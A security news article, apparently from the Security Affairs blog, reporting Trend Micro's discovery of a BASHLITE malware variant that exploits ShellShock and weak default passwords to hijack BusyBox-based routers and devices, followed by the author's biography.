A new variant of the BASHLITE malware exploiting the ShellShock vulnerability was used by cyber criminals to infect devices that use BusyBox software.
A new strain of the BASHLITE malware was detected by experts at Trend Micro shortly after the public disclosure of the ShellShock bug.
The malware, named ELF_BASHLITE.A (ELF_FLOODER.W), includes the payload of the ShellShock exploit code and it had been used by threat actors to run distributed denial-of-service (DDoS) attacks.
The new variant of the ELF_BASHLITE.A is able to infect devices were running BusyBox, a software that provides several Unix tools in a single executable file. BusyBox is specific embedded operating systems. Many routers and other network appliances run the software to advantage maintenance activities.
“we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scans the network for devices/machines running on BusyBox, and logs in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the Busybox system.” Rhena Inocencio, threat response engineer at Trend Micro, wrote in a blog post
The new variant of the BASHLITE malware is able to identify systems running BusyBox software and hijack them. The attack scenario is very simple, the malicious code first scans the network searching for the application and attempts to access them by using a set of credentials from a predefined dictionary. The list of passwords includes “root,” “admin,” “12345,” “pass,” “password” and “123456.”
Once the malware has gained the access to the software, it runs the command to download and run a couple of scripts bin.sh and bin2.sh scripts, to gaining control over the Busybox system.
“Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the Busybox system. BusyBox is built on top of the Linux kernel and used by small devices such as routers. Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive.”
Trend Micro invites administrators to change the default settings for their network devices and disable remote shell, if possible, to avoid its exploitation.
In October, experts at The Malware Must Die detected numerous attack worldwide exploiting the Bash Bug flaw to spread the Mayhem botnet.
The experts sustain that attacks using the exploit could top 1 billion in a short time, for this reason principal IT firms started releasing software updates to patch their solution and avoid the exploitation of the ShellShock flaw.
Unfortunately, there are many reasons that could hinder the patching of many systems that remain vulnerable to this kind of attack.
Last illustrious victim in order of time was BrowserStack, the cross-browser testing service; one of its servers was compromised using a ShellShock exploit that allowed attackers to access customer data.
Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer.
Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US.
Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines.
Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.